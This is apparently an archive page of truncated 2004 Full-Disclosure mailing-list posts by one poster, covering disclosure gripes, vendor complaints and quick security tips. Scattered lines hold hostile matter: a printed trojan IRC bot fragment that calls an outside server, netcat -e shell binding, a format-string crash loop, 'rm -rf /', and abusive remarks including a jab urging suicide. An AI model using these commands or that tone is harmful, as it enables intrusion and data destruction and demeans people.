When I tested things it was on MDaemon 6.8
Excuse me... they did respond and it was LESS than a year ago. =]. Here
is how it went:
--
02/03/2004 11:10 AM
Hello!
I have sent this on to the developers.
However, the issue you describe would
Berend-Jan Wever wrote:
My disclosure policy:
Most vendors treat hackers like free beta-testers that they can put the blame on when publicity goes bad.
Not only that ... some of the vendors even try to make you pay for a
support contract before you can report a security vulnerability. As a
Gadi Evron wrote:
He is not a messenger, he is the executioner.
Nah... its more like Microsoft is one of the executioners... they lead
all the sheep to slaughter every time they release a new piece of
software. Skylined just reminded you of where they are taking you.
How? How is he doing me a
can you define medium sized epidemic?
Any new features / functionality?
-KF
[EMAIL PROTECTED] wrote:
Hello,
Looks like new Sober.I worm is set to cause a medium sized
epidemic, AV firms are starting to send out warnings to
their public mailing lists now.
It would be way cool if Mr. Zarkawi has
W theres sand in my vagina... I think I'll unsubscribe myself.
STFU and subscribe to the moderated version.
http://lists.seifried.org/mailman/listinfo/security
As Skylined put it... if ya can't take the heat... get the fark out of
the kitchen. And while you are at it cook something up
all your graphic files are belong to us.
-KF
[EMAIL PROTECTED] wrote:
Frank Knobbe wrote:
Which leads to the question, which is a safe graphics file format? BMP
perhaps?
No:
http://lists.netsys.com/pipermail/full-disclosure/2004-September/026187.html
Then sign up for the ones that are moderated by other folks..
there are at least 3 copies of this list in moderated form.
-KF
Esler, Joel - Contractor wrote:
In my opinion, I believe this list should be moderated for about a month
or so. Just to weed the bullsh*t off.
J
-Original Message-
fake ap
http://bsdvault.net/bsdfap.txt
http://www.blackalchemy.to/project/fakeap/
-KF
[EMAIL PROTECTED] wrote:
List,
I'm an expert in nothing so when I saw this I had to ask, as Im sure theres
someone out there that is a WiFi expert.
Google has found no answer so here goes.
Last night we saw a
Did anyone war drive on election day? Wonder if any of the facilities
were THAT dumb...
-KF
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Professional responses like that *really* make me wanna go
out and pay for Eudora.
-KF
Steve Dorner wrote:
At 5:23 AM +1100 11/14/04, Paul Szabo wrote:
Some cases remain un-fixed, as Eudora developers know and admit
privately.
We knew nothing of the kind, nor did we admit anything
Jim Geovedi wrote:
Curt Purdy wrote:
Upgrade W2K to XP? I call that a downgrade! I won't allow XP (sp2 or
not)
on my network. All new boxes must be reformatted and W2K or SuSE
Linux or
BSD installed (unless of course it is a Mac with OpenBSD kernel that is
always welcome).
Interesting. Do you
Heavner, Charlie wrote:
Anybody having problems getting to www.microsoft.com
http://www.microsoft.com this afternoon?
no but for some reason I have a problem with the banner on the main page:
close the gaps in your network, download free security tools here.
should read:
close the gaps in your
The last time I called Microsoft and tryed to report a security hole I
was greeted by 1 moron, transfered to another who asked for $75 and then
when I refused and asked to speak to his supervisor, he suggested that I
use their security report web page... I wouldn't reccomend the phone
route to
Um... Yeah... thats gonna stop him. It takes all of about 2 minutes to
setup a new email address and resend.
Also who said the message was not spoofed?
-KF
raza wrote:
So have we identified the sender of the list and banned him from the
Mailing List.?
Raza
-Original Message-
From: [EMAIL
I'm Rick James bitch...
-KF
Cryptochrome wrote:
NOW go away!
May I ask: Who are you to tell people to go away?
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
its a trojan...
[EMAIL PROTECTED]:~ strings /tmp/hi
#!/usr/bin/perl
$chan=#0x;$nick=k;$server=ir3ip.net;$SIG{TERM}={};exit if fork;use
IO::Socket;$sock = IO::Socket::INET-new($server.:6667)||exit;print
$sock USER k +i k :kv1\nNICK k\n;$i=1;while($sock=~/^[^ ]+ ([^ ]+)
/){$mode=$1;last if
And to sum this all up... its fine for you all to STFU and take this
thread to your private mail spools.
Unless you are telling us about how Halliburton uses QPOP exploits to
root the UN... NO ONE CARES!@@#
Until Dick Cheney can type cc -o shutthefuckup shutthefuckup.c;
./shutthefuckupI
Here in Ohio the fabulous swing state we have evil hax0rs sp00fing snail
mail from elections officials. Several Ohio residents received mail
yesterday and today stating:
Due to poll overcrowding, the Ohio polls have been extended into
Wednesday. You can vote tomorrow from 9am to 9pm.
This is
Look for wonderful tray icons running as System... (anti-virus software
- *hint*hint*)
-KF
Valentin Höbel wrote:
Hi folks,
I'm at a boarding school in germany and we have a kind of internet
terminal there with win2003 running on the computers. My question is:
Is there a way of getting
The only reason this was never disclosed was originally in hopes of
proper vendor response... I spoke to their tech support about 5 times
but they were just total morons. I eventually gave up.
I was going to write a shatter like attack so this could be exploited
ala .exe file but I never had
What listens on port 2000?
-KF
[EMAIL PROTECTED] wrote:
Posted here:
http://dfind.kd-team.com/36/55/op.php
Stack based overflow, bug discovered by Luigi Auriemma
aluigi.altervista.org
Tested working on Win2K, This public version crash on any WinXP, read
the code why.
The exploit bind a shellcode
gpg --help
-KF
Joe Szilagyi wrote:
Hi,
What's the syntax to decrypt using this?
Regards,
Joe
- Original Message -
From: Mike Tancsa [EMAIL PROTECTED]
To: Ali Campbell [EMAIL PROTECTED];
[EMAIL PROTECTED]
Sent: Friday, October 22, 2004 1:46 PM
Subject: Re: [Full-Disclosure] Q: Linux
Support Apathy! I don't give a shit... do you?
Until you are debating over who has the best malloc() ninjitsu technique
or which on of them can exploit a shatter attack, QUIT discussing the
candidates!
-KF
The question comes to mind... why oh why did you cast your vote for
Kerry?
I guess
Not sure what your problem is but it works fine for me on Suse and
Firefox...
-KF
No it is not, at least not before you fix your broken downloadform. Hitting
submit does nothing at all. (You're not seriously telling us that you need
MSIE to download qwikfix, or do you ?!)
a disappointed
Things like this only need to be said once...
http://marc.free.net.ph/mbox/20020712.021114.b78a0d31.txt
-KF
Micheal Espinola Jr wrote:
All browsers but Microsoft Internet Explorer kept crashing on a regular
basis due to NULL pointer references, memory corruption, buffer
overflows, sometimes memory
Forget about the spammers, how about social engineers. This is quite the
gold mine for that.
Hi this is Joe Schmoe from building 69 I need to have my password reset.
-KF
i have to admit... it's pretty old and useless, but i think this may be a nice
place for spammers to try out some new
getting close
enogh to execute a local attack.
On Wed, 13 Oct 2004 10:30:27 -0400, KF_lists [EMAIL PROTECTED] wrote:
ISS would like to have you believe otherwise... when I contacted them
about the Local SYSTEM escalation in BlackICE we went in circles over
the fact that I feel that taking local
Has anyone heard of LeechX its supposed to be a hacked up BitchX
client that ties into a few sniffers that were installed on various
efnet boxen.
A few years ago I had an individual named Basharteg read me a few
lines from various private chanels as well as some of my own personal
Great... all the Mark of the Beast people will be popping up out of
the wood works.
Ahh freak out... the sky is falling. =]
-KF
insecure wrote:
The chip only stores an ID number. This ID number could be used as a
patient ID number to access records in some remote, allegedly secure
ISS would like to have you believe otherwise... when I contacted them
about the Local SYSTEM escalation in BlackICE we went in circles over
the fact that I feel that taking local SYSTEM on a win32 box IS a
problem and they don't. They tryed to say some crap like in all our
years in the
Who pissed in your Wheaties?
-KF
Clairmont, Jan M wrote:
I just don't understand people who think by using some cheap trick they
get into my files or website and hack them, that they have no personal responsibility.
It's insane to think and criminal that anything you can get into is fair game.
On my win2k box with SP4
atmadm.exe crashed with the format string test.
csvde.exe ipconfig.exe ldifde.exe sort.exe all crashed on the bof test.
-KF
Berend-Jan Wever wrote:
Hi all,
Wanna do a quick test to see if the programmers that wrote your windows operating
system have any clue as to what
I do not believe the point was to show that you can chew up system
resources... although that IS a side effect. That was not the point.
Add a sleep statement in there if it makes you feel better.
-KF
Clairmont, Jan M wrote:
;;for %i in (*.exe) do start %i %n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n
Joe Job anyone?
http://www.snopes.com/inboxer/hoaxes/joejobs/shadowcrew.asp
-KF
Todd Towles wrote:
What do you guys know about this? A friend told me he heard about it
on the radio yesterday. A co-worker recieved it in the mail...I
forwarded it to the proper officials..=) but wanted to see if
sure I'll get right on that.
want me to fdisk all the drives while I am at it?
-KF
r00t3d wrote:
KF(The Whitehat) wrote:
If I were you bill I would find the nearest building and throw myself
from the roof.
Oh yeah please rm -rf / that box before you jump!
-KF
Dear whitehat,
In regards to the
You won't ever find me wearing a hat... they mess my afro up.
-KF
Sean Crawford wrote:
You use the term whitehat like a dirty word?.
Who needs a hat?.
--- KF(The Whitehat) wrote:
---
--- If I were you bill I would find the nearest building and throw myself
--- from the roof.
---
--- Oh yeah
If I were you bill I would find the nearest building and throw myself
from the roof.
Oh yeah please rm -rf / that box before you jump!
-KF
Someone please tell me what I should do next!
___
Full-Disclosure - We believe in it.
Charter:
sarcasm
Um yeah... I am gonna trust vmyths.com to understand how buffer
overflows work... and I will hold their word as gold in regards to
potential exploitability.
RIiight.
Thats just such a shame that Guninskis efforts are so fruitless.
/sarcasm
-KF
Rob Rosenberger wrote:
Vmyths.com
-in-hand with idefense since day one. In fact, idefense advisories
and gobbles advisories on the same issue are almost always twinned.
Nice try.
On Thu, 9 Sep 2004, KF_lists wrote:
Please tell me you are not so retarded that you think this is the
*REAL* Richard Johnson. If he was representing
Please tell me you are not so retarded that you think this is the *REAL*
Richard Johnson. If he was representing iDEFENSE why the heck would he
be using an @bugtraq.org email address?
-KF
Über GuidoZ wrote:
I
just lost a lot of respect for iDEFENSE... being the Senior Security
Researcher, you
I'm Rick James bitch!
-KF
Adam wrote:
who are you friggen Dr Evil?
On Friday 13 August 2004 07:04 pm, KF_lists wrote:
Insert subject here ^
-KF
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure
sleuthkit and autopsy are your friend...
http://www.sleuthkit.org/autopsy/
-KF
ASB wrote:
It is possible to restore data after a format regardless of the filesystem.
This is not an NTFS issue, nor a Windows issue for that matter.
-ASB
On Sat, 4 Sep 2004 07:38:13 +1000 (EST), Craig Bumpstead
[EMAIL
And why exactly is this a ddos? I see nothing distributed about it. How
about you drop one of the d's in your description.
-KF
Orhan BAYRAK wrote:
if you try to connection request about 80 90 times on same time.. it gets a crash.. i attached a ddos exploit to this mail..
Will *ANYONE* that actually got hacked do me a favor and type:
uname -a
Then include that in your next email. I keep hearing fully patched
server however I have a feeling the Kernel was left out of the patching.
-KF
Todd Towles wrote:
Hey Ron,
Guest isn't a admin so they let the tool get in. But
This is cute...
http://p2pnet.net/story/2182
-KF
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
I am really not interrested in a pissing match but THIS was also From
the site
Currently, all Dell N-Series Precision Workstation desktops are
available and supported with Red Hat Linux.
-KF
From the site:
Dell does not officially support running Linux on Dell desktops.
Try again -- this
/me Pees again and goes away... enjoy the rest of the thread fellas..
the pissing match is in full effect.
-KF
Invicticide X wrote:
Apparently that 30 seconds did not include reading the page you
linked to.
Sure it did. I read it just fine... I believe you are the one that
missed the paragraph
OK - put your money where your mouth is. Pretend I'm a consumer. I
have 2000 USD to spend and want a good PC with a good warranty with
GNU/Linux on it. Find me a link to a major OEM that will ship me a PC
within those specs with decent hardware and a generally recognized name
(Dell,
Apparently that 30 seconds did not include reading the page you
linked to.
Sure it did. I read it just fine... I believe you are the one that
missed the paragraph stating:
Currently, all Dell N-Series Precision Workstation desktops are
available and supported with Red Hat Linux.
You are
Yeah ... take this to NTBugtraq or something...
-KF
Steffen Schumacher wrote:
I just wanted to remind everyone, that discussions, such as this, which
doesn't actually reveal any security related issues, could very elegantly
be taken off list, and help reduce the noise on this list.
This Windows
[EMAIL PROTECTED] wrote:
On Tue, 17 Aug 2004 13:04:49 PDT, Jeffrey Denton said:
Misc useless info, libsafe stops these, ummm, bugs.
And it can be found where?
http://www.research.avayalabs.com/project/libsafe/
-KF
___
Full-Disclosure - We
Don't bother asking Apple anything security related... they tend to not
respond. Their policy does not allow them to verify a bug even exists
until its fixed.
-KF
it wrote:
Freitag, 13. August 2004 20:01 wrote devis:
Beside, the unix based permissions system has proven far superior, ask
do you consider netcat with the -e flag a legacy unix command ?
-KF
IndianZ wrote:
Hi List
Is there a possibility to bind /bin/bash on a socket with legacy unix
commands?
Thanx in advance...
GreetZ from IndianZ
mailto:[EMAIL PROTECTED]
http://www.indianz.ch
are they setuid? give us an ls -al of each binary.
Gabriele Galadini wrote:
Hi all,
i've found some packages on obsd current version
(3.5) on arch x86, give me return problems.
I explain:
[EMAIL PROTECTED] export HOME=`perl -e 'print A x 4387'`
[EMAIL PROTECTED] dpsinfo
Segmentation fault
[EMAIL
Insert subject here ^
-KF
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
I really could not find a use for this... can anyone else?
rename it to .html and double click it. You must have msoffice installed I believe.
-KF
OBJECT id=wolfi height=32 width=32 classid=CLSID:D45FD31B-5C6E-11D1-9EC1-00C04FD7081F
/OBJECT
SCRIPT language=JavaScript type=text/javascript
The fact that the .ini files are Everyone Full control was pointed out
by us when we released SRT2004-01-17-0227
-http://lists.netsys.com/pipermail/full-disclosure/2004-January/016290.html
ISS said something along the lines of Windows is not commonly deployed
as a multi-user system and ...
57 matches
Mail list logo